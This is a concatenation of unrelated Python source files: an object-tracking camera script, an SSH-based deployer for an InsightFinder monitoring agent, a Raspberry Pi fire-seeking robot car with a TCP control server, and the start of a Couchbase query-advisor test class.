raise parser.error('argument -t/--txt: not allowed without argument -m/--mot')
# set up logging
logging.basicConfig(format='%(asctime)s [%(levelname)8s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(fastmot.__name__)
if args.quiet:
logger.setLevel(logging.WARNING)
elif args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# load config file
with open(args.config) as cfg_file:
config = json.load(cfg_file, cls=ConfigDecoder, object_hook=lambda d: SimpleNamespace(**d))
# load labels if given
if args.labels is not None:
with open(args.labels) as label_file:
label_map = label_file.read().splitlines()
fastmot.models.set_label_map(label_map)
stream = fastmot.VideoIO(config.resize_to, args.input_uri, args.output_uri, **vars(config.stream_cfg))
#stream2 = fastmot.VideoIO(config.resize_to, 'csi://1', args.output_uri, **vars(config.stream_cfg))
mot = None
#mot2 = None
txt = None
if args.mot:
draw = args.show or args.output_uri is not None
mot = fastmot.MOT(config.resize_to, count_global, **vars(config.mot_cfg), draw=draw)
mot.reset(stream.cap_dt)
#mot2 = fastmot.MOT(config.resize_to, **vars(config.mot_cfg), draw=draw)
#mot2.reset(stream.cap_dt)
if args.txt is not None:
Path(args.txt).parent.mkdir(parents=True, exist_ok=True)
txt = open(args.txt, 'w')
if args.show:
cv2.namedWindow('Video', cv2.WINDOW_AUTOSIZE)
if process_number.value == 1:
x = 200
y = 350
else:
x = 1100
y = 350
cv2.moveWindow('Video', x, y)
logger.info('Starting video capture...')
stream.start_capture()
try:
with Profiler('app') as prof:
while not args.show or cv2.getWindowProperty('Video', 0) >= 0:
frame = stream.read()
#frame2 = stream2.read()
if frame is None:
break
if args.mot:
mot.step(frame, count_global)
#mot2.step(frame)
if txt is not None:
for track in mot.visible_tracks():
tl = track.tlbr[:2] / config.resize_to * stream.resolution
br = track.tlbr[2:] / config.resize_to * stream.resolution
w, h = br - tl + 1
txt.write(f'{mot.frame_count},{track.trk_id},{tl[0]:.6f},{tl[1]:.6f},'
f'{w:.6f},{h:.6f},-1,-1,-1\n')
if args.show:
#two_stream_stacked = cv2.hconcat([frame,frame2])
cv2.imshow('Video', frame)
#cv2.imshow('Video', two_stream_stacked)
user_key = cv2.waitKey(1) & 0xFF
if user_key == 27: #press Esc to break
break
elif user_key == 114: #press 'r' to reset count
mot.tracker.reset_count_found(count_global)
if args.output_uri is not None:
stream.write(frame)
finally:
# clean up resources
if txt is not None:
txt.close()
stream.release()
cv2.destroyAllWindows()
# timing statistics
if args.mot:
avg_fps = round(mot.frame_count / prof.duration)
logger.info('Average FPS: %d', avg_fps)
mot.print_timing_info()
from multiprocessing import Process, Value
def main():
count_global = Value('i', 0)
process_one = Value('i', 1)
process_two = Value('i', 2)
p1 = Process(target=motcount, args=('csi://0', count_global, process_one, ))
p1.start()
p2 = Process(target=motcount, args=('csi://1', count_global, process_two, ))
p2.start()
#p1.join()
#p2.join()
if __name__ == '__main__':
main()
"""
from pathlib import Path
from types import SimpleNamespace
import argparse
import logging
import json
import cv2
import fastmot
import fastmot.models
from fastmot.utils import ConfigDecoder, Profiler
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
optional = parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
group = parser.add_mutually_exclusive_group()
optional.add_argument('-i', '--input-uri', metavar="URI", help=
'URI to input stream\n'
'1) image sequence (e.g. %%06d.jpg)\n'
'2) video file (e.g. file.mp4)\n'
'3) MIPI CSI camera (e.g. csi://0)\n'
'4) USB camera (e.g. /dev/video0)\n'
'5) RTSP stream (e.g. rtsp://<user>:<password>@<ip>:<port>/<path>)\n'
'6) HTTP stream (e.g. http://<user>:<password>@<ip>:<port>/<path>)\n')
optional.add_argument('-c', '--config', metavar="FILE",
default=Path(__file__).parent / 'cfg' / 'mot.json',
help='path to JSON configuration file')
optional.add_argument('-l', '--labels', metavar="FILE",
help='path to label names (e.g. coco.names)')
optional.add_argument('-o', '--output-uri', metavar="URI",
help='URI to output video file')
optional.add_argument('-t', '--txt', metavar="FILE",
help='path to output MOT Challenge format results (e.g. MOT20-01.txt)')
optional.add_argument('-m', '--mot', action='store_true', help='run multiple object tracker')
optional.add_argument('-s', '--show', action='store_true', help='show visualizations')
group.add_argument('-q', '--quiet', action='store_true', help='reduce output verbosity')
group.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')
parser._action_groups.append(optional)
args = parser.parse_args()
args.mot=True
args.show=True
args.input_uri='csi://0'
args.config='/home/geodrones/Documents/FastMOT/cfg/nano_v4tinyCH_fastobj.json'
if args.txt is not None and not args.mot:
raise parser.error('argument -t/--txt: not allowed without argument -m/--mot')
# set up logging
logging.basicConfig(format='%(asctime)s [%(levelname)8s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(fastmot.__name__)
if args.quiet:
logger.setLevel(logging.WARNING)
elif args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# load config file
with open(args.config) as cfg_file:
config = json.load(cfg_file, cls=ConfigDecoder, object_hook=lambda d: SimpleNamespace(**d))
# load labels if given
if args.labels is not None:
with open(args.labels) as label_file:
label_map = label_file.read().splitlines()
fastmot.models.set_label_map(label_map)
stream = fastmot.VideoIO(config.resize_to, args.input_uri, args.output_uri, **vars(config.stream_cfg))
#stream2 = fastmot.VideoIO(config.resize_to, 'csi://1', args.output_uri, **vars(config.stream_cfg))
mot = None
#mot2 = None
txt = None
if args.mot:
draw = args.show or args.output_uri is not None
mot = fastmot.MOT(config.resize_to, **vars(config.mot_cfg), draw=draw)
mot.reset(stream.cap_dt)
#mot2 = fastmot.MOT(config.resize_to, **vars(config.mot_cfg), draw=draw)
#mot2.reset(stream.cap_dt)
if args.txt is not None:
Path(args.txt).parent.mkdir(parents=True, exist_ok=True)
txt = open(args.txt, 'w')
if args.show:
cv2.namedWindow('Video', cv2.WINDOW_AUTOSIZE)
logger.info('Starting video capture...')
stream.start_capture()
try:
with Profiler('app') as prof:
while not args.show or cv2.getWindowProperty('Video', 0) >= 0:
frame = stream.read()
#frame2 = stream2.read()
if frame is None:
break
if args.mot:
mot.step(frame)
#mot2.step(frame)
if txt is not None:
for track in mot.visible_tracks():
tl = track.tlbr[:2] / config.resize_to * stream.resolution
br = track.tlbr[2:] / config.resize_to * stream.resolution
w, h = br - tl + 1
txt.write(f'{mot.frame_count},{track.trk_id},{tl[0]:.6f},{tl[1]:.6f},'
f'{w:.6f},{h:.6f},-1,-1,-1\n')
if args.show:
#two_stream_stacked = cv2.hconcat([frame,frame2])
cv2.imshow('Video', frame)
#cv2.imshow('Video', two_stream_stacked)
user_key = cv2.waitKey(1) & 0xFF
if user_key == 27: #press Esc to break
break
elif user_key == 114: #press 'r' to reset count
mot.tracker.reset_count_found()
if args.output_uri is not None:
stream.write(frame)
finally:
# clean up resources
if txt is not None:
txt.close()
stream.release()
cv2.destroyAllWindows()
# timing statistics
if args.mot:
avg_fps = round(mot.frame_count / prof.duration)
logger.info('Average FPS: %d', avg_fps)
mot.print_timing_info()
if __name__ == '__main__':
main()
"""
|
startcron.py
|
#!/usr/bin/python
import sys
import time
import os
import getpass
import getopt
import argparse
import re
import paramiko
import socket
import Queue
import threading
def sshDeploy(retry,hostname):
global projectName
global user
global password
global userInsightfinder
global licenseKey
global samplingInterval
global reportingInterval
global agentType
if retry == 0:
print "Deploy Fail in", hostname
q.task_done()
return
print "Start deploying agent in", hostname, "..."
try:
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if os.path.isfile(password) == True:
s.connect(hostname, username=user, key_filename = password, timeout=60)
else:
s.connect(hostname, username=user, password = password, timeout=60)
transport = s.get_transport()
session = transport.open_session()
session.set_combine_stderr(True)
session.get_pty()
if agentType == "hypervisor":
command="cd InsightAgent-master && ./hypervisor/install.sh -i "+projectName+" -u "+userInsightfinder+" -k "+licenseKey+" -s "+samplingInterval+" -r "+reportingInterval+" -t "+agentType
else:
if serverUrl is None:
command="cd InsightAgent-master && sudo ./deployment/install.sh -i "+projectName+" -u "+userInsightfinder+" -k "+licenseKey+" -s "+samplingInterval+" -r "+reportingInterval+" -t "+agentType
else:
command="cd InsightAgent-master && sudo ./deployment/install.sh -i "+projectName+" -u "+userInsightfinder+" -k "+licenseKey+" -s "+samplingInterval+" -r "+reportingInterval+" -t "+agentType+" -w "+serverUrl
session.exec_command(command)
stdin = session.makefile('wb', -1)
stdout = session.makefile('rb', -1)
stdin.write(password+'\n')
stdin.flush()
session.recv_exit_status() #wait for exec_command to finish
print "Deploy Succeed in", hostname
q.task_done()
return
except paramiko.SSHException, e:
print "Invalid Username/Password for %s:"%hostname , e
return sshDeploy(retry-1,hostname)
except paramiko.AuthenticationException:
print "Authentication failed for some reason in %s:"%hostname
return sshDeploy(retry-1,hostname)
except socket.error, e:
print "Socket connection failed in %s:"%hostname, e
return sshDeploy(retry-1,hostname)
except:
print "Unexpected error in %s:"%hostname
finally:
s.close()
def get_args():
parser = argparse.ArgumentParser(
description='Script retrieves arguments for insightfinder agent.')
parser.add_argument(
'-i', '--PROJECT_NAME_IN_INSIGHTFINDER', type=str, help='Project Name registered in Insightfinder', required=True)
parser.add_argument(
'-n', '--USER_NAME_IN_HOST', type=str, help='User Name in Hosts', required=True)
parser.add_argument(
'-u', '--USER_NAME_IN_INSIGHTFINDER', type=str, help='User Name in Insightfinder', required=True)
parser.add_argument(
'-k', '--LICENSE_KEY', type=str, help='License key for the user', required=True)
parser.add_argument(
'-s', '--SAMPLING_INTERVAL_MINUTE', type=str, help='Sampling Interval Minutes', required=True)
parser.add_argument(
'-r', '--REPORTING_INTERVAL_MINUTE', type=str, help='Reporting Interval Minutes', required=True)
parser.add_argument(
'-t', '--AGENT_TYPE', type=str, help='Agent type: proc or cadvisor or docker_remote_api or cgroup or daemonset or elasticsearch or collectd or hypervisor or ec2monitoring or jolokia', choices=['proc', 'cadvisor', 'docker_remote_api', 'cgroup', 'daemonset', 'elasticsearch', 'collectd', 'hypervisor', 'ec2monitoring', 'jolokia'], required=True)
parser.add_argument(
'-p', '--PASSWORD', type=str, help='Password for hosts', required=True)
    parser.add_argument('-w', '--SERVER_URL', type=str, help='InsightFinder server URL (optional)', required=False)
args = parser.parse_args()
projectName = args.PROJECT_NAME_IN_INSIGHTFINDER
user = args.USER_NAME_IN_HOST
userInsightfinder = args.USER_NAME_IN_INSIGHTFINDER
licenseKey = args.LICENSE_KEY
samplingInterval = args.SAMPLING_INTERVAL_MINUTE
reportingInterval = args.REPORTING_INTERVAL_MINUTE
agentType = args.AGENT_TYPE
password = args.PASSWORD
serverUrl = args.SERVER_URL
return projectName, user, userInsightfinder, licenseKey, samplingInterval, reportingInterval, agentType, password, serverUrl
if __name__ == '__main__':
global projectName
global user
global password
global hostfile
global userInsightfinder
global licenseKey
global samplingInterval
global reportingInterval
global agentType
global serverUrl
hostfile="hostlist.txt"
projectName, user, userInsightfinder, licenseKey, samplingInterval, reportingInterval, agentType, password, serverUrl = get_args()
q = Queue.Queue()
try:
with open(os.getcwd()+"/"+hostfile, 'rb') as f:
while True:
line = f.readline()
if line:
host=line.split("\n")[0]
q.put(host)
else:
break
while q.empty() != True:
host = q.get()
t = threading.Thread(target=sshDeploy, args=(3,host,))
t.daemon = True
t.start()
q.join()
except (KeyboardInterrupt, SystemExit):
print "Keyboard Interrupt!!"
sys.exit()
except IOError as e:
print "I/O error({0}): {1}: {2}".format(e.errno, e.strerror, e.filename)
sys.exit()
|
mserver.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 10 21:52:21 2021
@author: qq735
"""
from multiprocessing import Process
from socket import *
# import wiringpi
import RPi.GPIO as GPIO
import time
import string
import threading
import timeout_decorator
import serial
import pynmea2
serialPort = serial.Serial("/dev/ttyUSB0", 9600, timeout=0.5)
from ctypes import *
import numpy as np
mlx90640 = cdll.LoadLibrary('./libmlx90640.so')
# Initialize the up/down and left/right servo angles to 90 degrees
ServoLeftRightPos = 90
ServoUpDownPos = 90
g_frontServoPos = 90
nowfrontPos = 0
# Car motor pin definitions
IN1 = 20
IN2 = 21
IN3 = 19
IN4 = 26
ENA = 16
ENB = 13
# Ultrasonic sensor pin definitions
EchoPin = 0
TrigPin = 1
# RGB LED pin definitions
LED_R = 22
LED_G = 27
LED_B = 24
# Servo pin definitions
FrontServoPin = 23
ServoUpDownPin = 9
ServoLeftRightPin = 11
# Infrared obstacle-avoidance pin definitions
AvoidSensorLeft = 12
AvoidSensorRight = 17
# Buzzer pin definition
buzzer = 8
# Variable definitions
# RGB LED color variables
red = 0
green = 0
blue = 0
# TCP packet flag plus receive/send data variables
NewLineReceived = 0
InputString = ''
recvbuf = ''
ReturnTemp = ''
# Car and servo state variables
g_CarState = 0
g_ServoState = 0
# Car speed variable: 20 means 40 cm per second
CarSpeedControl = 20
# Line-tracking, obstacle-avoidance and light-seeking variables
infrared_track_value = ''
infrared_avoid_value = ''
LDR_value = ''
g_lednum = 0
# Use BCM numbering for the GPIO pins
GPIO.setmode(GPIO.BCM)
# Ignore GPIO warnings
GPIO.setwarnings(False)
import eventlet
import time
eventlet.monkey_patch()
# Motor pin initialization
def init():
global pwm_ENA
global pwm_ENB
global delaytime
global CarSpeedControl
global pwm_FrontServo
global pwm_UpDownServo
global pwm_LeftRightServo
global nowfrontPos
GPIO.setup(ENA, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(IN1, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(IN2, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(ENB, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(IN3, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(IN4, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(buzzer, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(EchoPin, GPIO.IN)
GPIO.setup(TrigPin, GPIO.OUT)
GPIO.setup(FrontServoPin, GPIO.OUT)
GPIO.setup(ServoUpDownPin, GPIO.OUT)
GPIO.setup(ServoLeftRightPin, GPIO.OUT)
GPIO.setup(LED_R, GPIO.OUT)
GPIO.setup(LED_G, GPIO.OUT)
GPIO.setup(LED_B, GPIO.OUT)
    # Set up the PWM pins with a frequency of 2000 Hz
pwm_ENA = GPIO.PWM(ENA, 2000)
pwm_ENB = GPIO.PWM(ENB, 2000)
# pwm_ENA.start(0)
# pwm_ENB.start(0)
pwm_FrontServo = GPIO.PWM(FrontServoPin, 50)
pwm_UpDownServo = GPIO.PWM(ServoUpDownPin, 50)
pwm_LeftRightServo = GPIO.PWM(ServoLeftRightPin, 50)
pwm_FrontServo.start(0)
pwm_UpDownServo.start(0)
pwm_LeftRightServo.start(0)
# Thermal (infrared) camera
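# Reads one 768-pixel frame (32 x 24) from the MLX90640 thermal camera via the shared
# library loaded above, and returns the maximum temperature together with a horizontal
# index (0-31) derived from the hottest pixel, used later as a heading offset.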
def tcam():
temp = (c_float * 768)()
ptemp = pointer(temp)
mlx90640.get_mlx90640_temp(ptemp)
my_nparray = np.frombuffer(temp, dtype=np.float32)
t = my_nparray.reshape((32, 24))
# print(np.max(t))
# print(np.argmax(t))
return np.max(t), np.argmax(t) % 32
# GPS latitude / longitude / altitude
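# Reads one NMEA sentence from the serial GPS; only GGA sentences (which carry the
# position fix) are parsed with pynmea2, otherwise (-1, -1, -1) is returned.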
def GetGPS():
lat = -1
lon = -1
alt = -1
s = serialPort.readline()
# print(s)
# print(type(s.decode()))
# print(s.find(b'GGA'))
s = s.decode()
if s.find('GGA') > -1:
msg = pynmea2.parse(s)
lat = msg.lat
lon = msg.lon
alt = msg.altitude
return (lat, lon, alt)
# Ultrasonic distance measurement
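# Sends a ~15 us trigger pulse and times the echo; distance in cm is
# (echo duration) * 340 m/s / 2, multiplied by 100 to convert metres to centimetres.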
def Distance_test():
GPIO.output(TrigPin, GPIO.HIGH)
time.sleep(0.000015)
GPIO.output(TrigPin, GPIO.LOW)
while not GPIO.input(EchoPin):
pass
t1 = time.time()
while GPIO.input(EchoPin):
pass
t2 = time.time()
# print ("distance is %d " % (((t2 - t1)* 340 / 2) * 100))
time.sleep(0.01)
return ((t2 - t1) * 340 / 2) * 100
# Light the RGB LED color corresponding to the rotation angle
def corlor_light(pos):
if pos > 150:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
elif pos > 125:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.LOW)
elif pos > 100:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.HIGH)
elif pos > 75:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.LOW)
elif pos > 50:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.HIGH)
elif pos > 25:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.HIGH)
elif pos > 0:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.HIGH)
else:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
# Sweep the servos back and forth
def servo_control_color():
for pos in range(19):
frontservo_appointed_detection(pos * 10)
time.sleep(0.02)
updownservo_appointed_detection(pos * 10)
time.sleep(0.02)
leftrightservo_appointed_detection(pos * 10)
time.sleep(0.02)
corlor_light(pos)
for pos in reversed(range(19)):
frontservo_appointed_detection(pos * 10)
time.sleep(0.02)
updownservo_appointed_detection(pos * 10)
time.sleep(0.02)
leftrightservo_appointed_detection(pos * 10)
time.sleep(0.02)
corlor_light(pos)
# Drive the car forward
def run():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
    # Start PWM and set the duty cycle (range 0--100)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
print('runrun')
# pwm_ENA.ChangeDutyCycle(CarSpeedControl)
# pwm_ENB.ChangeDutyCycle(CarSpeedControl)
# Drive the car backward
def back():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
# Turn the car left
def left():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# Turn the car right
def right():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# Spin the car left in place
def spin_left():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# Spin the car right in place
def spin_right():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# Stop the car
def brake():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
# Sound the buzzer briefly
def whistle():
GPIO.output(buzzer, GPIO.LOW)
time.sleep(0.1)
GPIO.output(buzzer, GPIO.HIGH)
time.sleep(0.001)
# Rotate the front servo to the specified angle
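# The three servo helpers below bit-bang one ~20 ms PWM frame per call:
# pulse width = pos * 11 + 500 microseconds, mapping 0-180 degrees to roughly 0.5-2.5 ms.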
def frontservo_appointed_detection(pos):
pulsewidth = (pos * 11) + 500
GPIO.output(FrontServoPin, GPIO.HIGH)
time.sleep(pulsewidth / 1000000.0)
GPIO.output(FrontServoPin, GPIO.LOW)
time.sleep(20.0 / 1000 - pulsewidth / 1000000.0)
global nowfrontPos
nowfrontPos = pos
def leftrightservo_appointed_detection(pos):
pulsewidth = (pos * 11) + 500
GPIO.output(ServoLeftRightPin, GPIO.HIGH)
time.sleep(pulsewidth / 1000000.0)
GPIO.output(ServoLeftRightPin, GPIO.LOW)
time.sleep(20.0 / 1000 - pulsewidth / 1000000.0)
global nowfrontPos
nowfrontPos = pos
# Rotate the camera tilt servo up/down to the specified angle
def updownservo_appointed_detection(pos):
pulsewidth = (pos * 11) + 500
GPIO.output(ServoUpDownPin, GPIO.HIGH)
time.sleep(pulsewidth / 1000000.0)
GPIO.output(ServoUpDownPin, GPIO.LOW)
time.sleep(20.0 / 1000 - pulsewidth / 1000000.0)
global nowfrontPos
nowfrontPos = pos
def servo_init():
servoinitpos = 90
for i in range(18):
frontservo_appointed_detection(servoinitpos)
time.sleep(0.02)
updownservo_appointed_detection(servoinitpos)
time.sleep(0.02)
leftrightservo_appointed_detection(servoinitpos)
time.sleep(0.02)
    # pwm_FrontServo.ChangeDutyCycle(0)  # zero the signal
    # pwm_LeftRightServo.ChangeDutyCycle(0)  # zero the signal
    # pwm_UpDownServo.ChangeDutyCycle(0)  # zero the signal
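# Autonomous fire-seeking routine: sweep the front servo from 0 to 180 degrees in
# 30-degree steps, recording the ultrasonic distance and the hottest thermal pixel at
# each heading, then spin toward the hottest heading and drive; once the measured
# temperature exceeds 100 the target is treated as found and the GPS fix is printed.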
def auto():
# init()
# servo_init()
taxishu = 0.008
FindNum = 0
while FindNum == 0:
distance = []
temperature = []
angle = []
for i in range(7):
for ii in range(9):
frontservo_appointed_detection(i * 30)
time.sleep(0.01)
time.sleep(0.8)
distance.append(Distance_test())
t, k = tcam()
temperature.append(t)
k = int((k - 15.5) / 31 * 55)
angle.append(k)
        # Straight ahead is 0; negative values are to the right, positive to the left
for i in range(18):
frontservo_appointed_detection(90)
time.sleep(0.02)
print(distance)
print(temperature)
print(angle)
index = temperature.index(max(temperature))
target_angle = angle[index] + index * 30
print(index)
print(target_angle)
        # Temperature is high enough: the fire source has been found
if temperature[index] > 100:
FindNum = FindNum + 1
lat, lon, alt = GetGPS()
print("-- Lat: %s -- Lon: %s -- Altitude: %s" % (lat, lon, alt))
for i in range(3):
servo_control_color()
break
if target_angle <= 90:
            # Target is to the right
needtime = (90 - target_angle) * taxishu
spin_right()
time.sleep(needtime)
brake()
elif target_angle > 90:
            # Target is to the left
needtime = (target_angle - 90) * taxishu
spin_left()
time.sleep(needtime)
brake()
if distance[index] > 60:
run()
time.sleep(2)
brake()
elif distance[index] < 60 and distance[index] > 40 or temperature[index] > 35:
run()
time.sleep(1)
print("快了")
brake()
elif (distance[index] < 50 or distance[min(index + 1, 6)] < 50 or distance[max(0, index - 1)] < 50) and (
temperature[index] < 38):
            print('Avoiding obstacle')
left()
time.sleep(1)
brake()
time.sleep(0.2)
run()
time.sleep(1.5)
brake()
time.sleep(0.2)
right()
time.sleep(2)
brake()
# Front servo to the left
def front_servo0():
for i in range(18):
frontservo_appointed_detection(0)
time.sleep(0.02)
def front_servo45():
for i in range(18):
frontservo_appointed_detection(45)
time.sleep(0.02)
def front_servo90():
for i in range(18):
frontservo_appointed_detection(90)
time.sleep(0.02)
def front_servo135():
for i in range(18):
frontservo_appointed_detection(135)
time.sleep(0.02)
def front_servo180():
for i in range(18):
frontservo_appointed_detection(180)
time.sleep(0.02)
# Rotate the camera pan servo left/right to the specified angle
################################################################ Serve commands from the connected client
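# Single-character command protocol handled below (commands arrive as GBK-encoded bytes):
#   w / s / a / d      : forward / backward / left / right
#   x                  : brake
#   e / q              : spin right / spin left in place
#   y / u / i / o / p  : front servo to 0 / 45 / 90 / 135 / 180 degrees
#   n                  : run the autonomous routine auto()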
def do_service(connect_socket):
while True:
recv_data = connect_socket.recv(1024)
if len(recv_data) == 0:
            # When the sender closes the TCP connection, recv() does not block and returns an empty string immediately
# print('client %s close' % str(client_addr))
# s.getpeername() s.getsockname()
# wiringpi.digitalWrite(0,0)
print('client %s close' % str(connect_socket.getpeername()))
break
if (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'w'):
with eventlet.Timeout(1, False):
run()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 's'):
with eventlet.Timeout(1, False):
back()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'a'):
with eventlet.Timeout(1, False):
left()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'd'):
with eventlet.Timeout(1, False):
right()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'x'):
with eventlet.Timeout(1, False):
brake()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'e'):
with eventlet.Timeout(1, False):
spin_right()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'q'):
with eventlet.Timeout(1, False):
spin_left()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'y'):
with eventlet.Timeout(1, False):
front_servo0()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'u'):
with eventlet.Timeout(1, False):
front_servo45()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'i'):
with eventlet.Timeout(1, False):
front_servo90()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'o'):
with eventlet.Timeout(1, False):
front_servo135()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'p'):
with eventlet.Timeout(1, False):
front_servo180()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'n'):
auto()
# # else:
# wiringpi.digitalWrite(0,0)
# if len(recv_data) > 1:
# wiringpi.digitalWrite(0,0)
print('recv: %s' % recv_data.decode('gbk'))
def main():
init()
servo_init()
# 0.init wiringpi
# wiringpi.wiringPiSetup()
# wiringpi.pinMode(0,1)
    # 1. Create the listening socket
listen_socket = socket(AF_INET, SOCK_STREAM)
    # SOCK_STREAM is a stream socket, i.e. TCP
    # Allow address reuse so the server can rebind immediately after it shuts down
    # Set the SO_REUSEADDR socket option: reuse the address without waiting out 2*MSL
listen_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    # 2. Bind the port
my_addr = ('192.168.183.171', 8888) #che
listen_socket.bind(my_addr)
    # 3. Put the socket into listening mode
    listen_socket.listen(4)  # 4 is the backlog of pending connections
print('listening...')
    # 4. Wait for client connection requests
    # The parent process focuses only on accepting connections
while True:
        # Accept a connection request; the new socket is used to talk to this client
        connect_socket, client_addr = listen_socket.accept()  # accept() blocks by default
        # (newly created connection socket, client address)
# print(connect_socket)
        # For every new client connection, spawn a child process that handles the communication
process_do_service = Process(target=do_service, args=(connect_socket,))
process_do_service.start()
        # The parent process closes its copy of connect_socket
connect_socket.close()
if __name__ == '__main__':
main()
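# Minimal client sketch (illustrative only; the address must match my_addr above):
#   from socket import socket, AF_INET, SOCK_STREAM
#   s = socket(AF_INET, SOCK_STREAM)
#   s.connect(('192.168.183.171', 8888))
#   s.send('w'.encode('gbk'))  # drive forward
#   s.close()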
tuq_advisor.py
from remote.remote_util import RemoteMachineShellConnection
from .tuq import QueryTests
import time
from deepdiff import DeepDiff
from membase.api.exception import CBQError
import threading
class QueryAdvisorTests(QueryTests):
def setUp(self):
super(QueryAdvisorTests, self).setUp()
self.log.info("============== QueryAdvisorTests setup has started ==============")
self.index_to_be_created = self.input.param("index_to_be_created", '')
if self.load_sample:
self.rest.load_sample("travel-sample")
init_time = time.time()
while True:
next_time = time.time()
query_response = self.run_cbq_query("SELECT COUNT(*) FROM `" + self.bucket_name + "`")
self.log.info(f"{self.bucket_name}+ count: {query_response['results'][0]['$1']}")
if query_response['results'][0]['$1'] == 31591:
break
if next_time - init_time > 600:
break
time.sleep(2)
self.wait_for_all_indexes_online()
list_of_indexes = self.run_cbq_query(query="select raw name from system:indexes WHERE indexes.bucket_id is missing")
for index in list_of_indexes['results']:
if index == "def_primary":
continue
else:
self.run_cbq_query(query="drop index `travel-sample`.`%s`" % index)
self.purge_all_sessions()
self.log.info("============== QueryAdvisorTests setup has completed ==============")
self.log_config_info()
def suite_setUp(self):
super(QueryAdvisorTests, self).suite_setUp()
self.log.info("============== QueryAdvisorTests suite_setup has started ==============")
self.log.info("============== QueryAdvisorTests suite_setup has completed ==============")
def tearDown(self):
self.log.info("============== QueryAdvisorTests tearDown has started ==============")
travel_sample = self.get_bucket_from_name("travel-sample")
if travel_sample:
self.delete_bucket(travel_sample)
self.log.info("============== QueryAdvisorTests tearDown has completed ==============")
super(QueryAdvisorTests, self).tearDown()
def suite_tearDown(self):
self.log.info("============== QueryAdvisorTests suite_tearDown has started ==============")
